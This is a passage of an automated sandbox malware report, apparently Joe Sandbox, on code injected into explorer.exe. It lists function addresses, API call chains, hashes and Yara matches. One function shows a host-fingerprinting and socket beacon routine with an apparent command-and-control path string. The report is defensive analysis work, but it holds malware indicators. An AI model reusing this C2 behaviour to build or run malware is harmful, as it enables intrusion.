                                                                                                                                                                                                                          • Part of subcall function 0E09D4B1: _NMSG_WRITE.LIBCMT ref: 0E09D4EB
                                                                                                                                                                                                                          • Part of subcall function 0E09D4B1: _callnewh.LIBCMT ref: 0E09D51F
                                                                                                                                                                                                                          • Part of subcall function 0E09D4B1: _errno.LIBCMT ref: 0E09D52A
                                                                                                                                                                                                                          • Part of subcall function 0E09D4B1: _errno.LIBCMT ref: 0E09D535
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E081544
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E08154C
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E081554
                                                                                                                                                                                                                        • free.LIBCMT ref: 0E08155D
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692587166.000000000E080000.00000040.00000400.00020000.00000000.sdmp, Offset: 0E080000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e080000_explorer.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$_errno$_callnewhmalloc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2761444284-0
                                                                                                                                                                                                                        • Opcode ID: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction ID: e3e13bcefb5c18dca927967a4372d1f5f0cea00ae3d6562fe980966065cbd3f4
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 89003d18724c760acf33120327dc08f5968b530597684a6895f375dd43fdf9cc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0FD13431658B488FDB68EF28D8596AE77E1FB98305F10062EE48BC7250DF74D906CB81
                                                                                                                                                                                                                        Function 0DFD02F0 Relevance: .0, Instructions: 7COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 729c3b4835a6834bc6ca702b346004f04212394b198bebd1968db775b09b660a
                                                                                                                                                                                                                        • Instruction ID: 375e288e5b331deed33cec246ebd64f5d90b295931015d93c7a0a36507389802
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 729c3b4835a6834bc6ca702b346004f04212394b198bebd1968db775b09b660a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35B0128B88EBE02CD313493D2C028982F055043871B8C4345DAD0000D55000C4854330
                                                                                                                                                                                                                        Function 0DFD0340 Relevance: .0, Instructions: 3COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
                                                                                                                                                                                                                        • Instruction ID: 038cc99b61fe1a58f79dc842e8ffe6d2d7c0790616e2838ebdfb41b054369831
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c307f67adb8aff98d3f095286b2b700dfcb55a183617c16c72d4ace8312b7d4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Function 0DFD0370 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Function 0E130370 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Function 0FF70370 Relevance: .0, Instructions: 1COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction ID: 33f440db8dcf76ed1806d7bd443262935e64228566635c654bb1f16f699d93a5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 103d6254a6d94bacc82e822885185f56c69cb799ec5124c0aa405e386975151b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                                        Function 0DFBAE60 Relevance: 49.9, APIs: 33, Instructions: 363stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 812771569-0
                                                                                                                                                                                                                        • Opcode ID: 446faeafd06da1299cb99806716bd47ee0507f5573767720f34ae69a3c23ae9e
                                                                                                                                                                                                                        • Instruction ID: f457016a041dd9fdf9130579497d10c50768a9e4502133d5fc9edfba6555bee8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 446faeafd06da1299cb99806716bd47ee0507f5573767720f34ae69a3c23ae9e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7E149626057428BDB21DFAAE8943BA73A2F744B95F04D02ACB8B47B64DF7CD444CB50
                                                                                                                                                                                                                        Function 0E11AE60 Relevance: 49.9, APIs: 33, Instructions: 363stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 812771569-0
                                                                                                                                                                                                                        • Opcode ID: 11e5b956b3368ed5495092f0787d9a908bc5de416d5a4e08dd7e195be530881e
                                                                                                                                                                                                                        • Instruction ID: 984a3b48d7cc9bb41893f3417fb14c6511eeca8e2abdbb8ea15273e4bea4c886
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11e5b956b3368ed5495092f0787d9a908bc5de416d5a4e08dd7e195be530881e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDE18CB130A781C7DB24DB26E8947AE77A1FB48B85F410825CB8A57B54DF7CD884CB41
                                                                                                                                                                                                                        Function 0FF5AE60 Relevance: 49.9, APIs: 33, Instructions: 363stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: memcpy$malloc$realloc$free$CriticalSectionlstrlen$EnterLeavewsprintf
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 812771569-0
                                                                                                                                                                                                                        • Opcode ID: 11e5b956b3368ed5495092f0787d9a908bc5de416d5a4e08dd7e195be530881e
                                                                                                                                                                                                                        • Instruction ID: 8384fa1b82ddbe26dea9dc46862b6fa3de45e32464ece0080dd35836d22f1af1
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11e5b956b3368ed5495092f0787d9a908bc5de416d5a4e08dd7e195be530881e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21E12662605B428BDB709B26E89437A77A1FB84FC5F400139CF8A87B56DF7CE4468B40
                                                                                                                                                                                                                        Function 0DFBAC80 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 193stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                        • String ID: 2
                                                                                                                                                                                                                        • API String ID: 4124047334-450215437
                                                                                                                                                                                                                        • Opcode ID: c9d171b352920f4e7f850daaabd59ccca9f0d7deed6e5898ae2756d441c60d4c
                                                                                                                                                                                                                        • Instruction ID: e4c2859dab13d452e0b3a754628ff1c7b9bfa9dbedb8c21824a2d9c1b56bab97
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9d171b352920f4e7f850daaabd59ccca9f0d7deed6e5898ae2756d441c60d4c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73715564605B0285EA14ABABED943BA7362BB85BE1F44C43ACD0B87774EE3CC4458760
                                                                                                                                                                                                                        Function 0E11AC80 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 193stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                        • String ID: 2
                                                                                                                                                                                                                        • API String ID: 4124047334-450215437
                                                                                                                                                                                                                        • Opcode ID: c949912b412b4ea7f5cdd3e04349eb3bba8bbdfecfb46dda596e31b717203312
                                                                                                                                                                                                                        • Instruction ID: de0d2366f5e3de4341f076c10be1201a6df15f422884e83d419f122af7076890
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c949912b412b4ea7f5cdd3e04349eb3bba8bbdfecfb46dda596e31b717203312
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03717DF0206B80C5EA18EF62F9947AA63A1BB89FD1F540865DD0A577A4DF3CC8C5C741
                                                                                                                                                                                                                        Function 0FF5AC80 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 193stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$CriticalSectionmemcpy$Leavemallocstrncmp$Enterlstrlenrealloc
                                                                                                                                                                                                                        • String ID: 2
                                                                                                                                                                                                                        • API String ID: 4124047334-450215437
                                                                                                                                                                                                                        • Opcode ID: c949912b412b4ea7f5cdd3e04349eb3bba8bbdfecfb46dda596e31b717203312
                                                                                                                                                                                                                        • Instruction ID: 265178f9a483de787714528471edd553770716f219857641cc4d1d588fe4b348
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c949912b412b4ea7f5cdd3e04349eb3bba8bbdfecfb46dda596e31b717203312
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F4714565605B0385EB24AF62ED9437A6BA1BF85FD1F840135CE0A8BB66DF3CD04AD740
                                                                                                                                                                                                                        Function 0DFA8FA0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 107stringCOMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32 ref: 0DFA8FE8
                                                                                                                                                                                                                        • RtlInitializeCriticalSection.NTDLL ref: 0DFA8FF5
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DFA902A
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: GetWindowsDirectoryA.KERNEL32 ref: 0DFA9B7C
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: GetVolumeInformationA.KERNEL32 ref: 0DFA9BC6
                                                                                                                                                                                                                          • Part of subcall function 0DFA9B30: wsprintfA.USER32 ref: 0DFA9C27
                                                                                                                                                                                                                        • lstrcpyA.KERNEL32 ref: 0DFA904D
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA905D
                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 0DFA90F4
                                                                                                                                                                                                                          • Part of subcall function 0DFA91C0: EnterCriticalSection.KERNEL32 ref: 0DFA91CB
                                                                                                                                                                                                                          • Part of subcall function 0DFA91C0: LeaveCriticalSection.KERNEL32 ref: 0DFA91FB
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: send.WS2_32 ref: 0DFA703C
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: recv.WS2_32 ref: 0DFA70A3
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcmpiA.KERNEL32 ref: 0DFA7103
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrlenA.KERNEL32 ref: 0DFA7127
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: StrStrA.SHLWAPI ref: 0DFA713F
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcmpiA.KERNEL32 ref: 0DFA715E
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: strtol.MSVCRT ref: 0DFA7176
                                                                                                                                                                                                                        • lstrcatA.KERNEL32 ref: 0DFA906D
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcpyA.KERNEL32 ref: 0DFA6E6E
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6E7F
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6E93
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EA7
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EB8
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6ECC
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6EEA
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: wsprintfA.USER32 ref: 0DFA6F02
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F16
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F2A
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrcatA.KERNEL32 ref: 0DFA6F66
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: WSAStartup.WS2_32 ref: 0DFA6F76
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: socket.WS2_32 ref: 0DFA6F92
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: gethostbyname.WS2_32 ref: 0DFA6FA9
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: memcpy.MSVCRT ref: 0DFA6FC9
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: htons.WS2_32 ref: 0DFA6FD8
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: connect.WS2_32 ref: 0DFA6FEF
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: lstrlenA.KERNEL32 ref: 0DFA7005
                                                                                                                                                                                                                          • Part of subcall function 0DFA6E10: send.WS2_32 ref: 0DFA701B
                                                                                                                                                                                                                        • memcpy.MSVCRT ref: 0DFA910C
                                                                                                                                                                                                                        • lstrlenA.KERNEL32 ref: 0DFA911A
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$CriticalSection$lstrcpylstrlen$EnterLeavelstrcmpimemcpysendwsprintf$DirectoryInformationInitializeStartupVolumeWindowsconnectgethostbynamehtonsrecvsocketstrtol
                                                                                                                                                                                                                        • String ID: /VzCAHn.php?2F409E82DCA61388941053$2F409E82DCA61388941053
                                                                                                                                                                                                                        • API String ID: 1973528353-3252209160
                                                                                                                                                                                                                        • Opcode ID: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction ID: e4eb503f5185601f7947bf2dfa7ce003ef175f4c2151767763c4bd05f8c3f137
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e534138d032882a20b8057ea1649a8c508f8bec9dde78e52e480184a9a0b3790
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F6512675604B4695EB10DFAAF88437A73A5F788B84F408026DA8E87B34DF78C549CB60
                                                                                                                                                                                                                        Function 0DFC1130 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DFA0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFE9000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692336010.000000000DFEB000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_dfa0000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4099253644-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: 520105b571c3097510efecb2dd2ac8dcac807dda6b02397bfbc0b5d6810df137
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE312F25A05B0695FE14DBDAED903B93325BB45B74F09C226C92F062B2CF7CC4A58A31
                                                                                                                                                                                                                        Function 0E121130 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2692713862.000000000E100000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E100000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E149000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2692713862.000000000E14B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_e100000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4099253644-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: db801ebe3a0ee96db9703523295bbe9f666fd5abff5306abcdbf06096061c05f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D0312F71712A85A1EE14DBB6FCA03E92360BB8AB51F184E75CC2A173E0DF3CC8959304
                                                                                                                                                                                                                        Function 0FF61130 Relevance: 18.1, APIs: 12, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0FF40000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF89000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000005.00000002.2693672172.000000000FF8B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_ff40000_explorer.jbxd
                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4099253644-0
                                                                                                                                                                                                                        • Opcode ID: e9f5f2c6d9d52227c1224fb5eb956fae150d2f2d84a34203266234652f144675
                                                                                                                                                                                                                        • Instruction ID: f90a3d51fcf4ad181249dedb76805987559b4cae7be70c6065e662673e1850e1
